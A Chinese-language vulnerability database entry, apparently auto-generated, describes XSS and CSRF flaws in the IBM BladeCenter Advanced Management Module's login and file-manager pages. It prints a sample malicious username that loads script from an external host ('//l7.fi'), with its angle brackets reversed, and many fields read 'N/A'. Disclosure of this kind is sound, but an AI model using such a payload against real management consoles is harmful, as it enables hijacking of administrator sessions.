漏洞信息
尽管我们使用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性,但请您根据实际情况进行核实和判断。
漏洞
N/A
漏洞信息
Multiple cross-site scripting (XSS) vulnerabilities in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via (1) the username in a login action or (2) the PATH parameter to private/file_management.ssi in the File manager.
漏洞信息
N/A
漏洞
N/A
漏洞
IBM BladeCenter高级管理模块 多个跨站脚本和跨站请求伪造漏洞
漏洞信息
IBM BladeCenter是美国IBM公司的系列高性能刀片服务器。 BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话,AMM会在事件日志页面记录用户所提交的凭据,之后管理员查看事件日志时就会执行所注入的内容。例如,攻击者可以使用以下用户名登录导致注入: JavaScript:>/script< >script src="//l7.fi"< >/script< >script<
漏洞信息
N/A
漏洞
N/A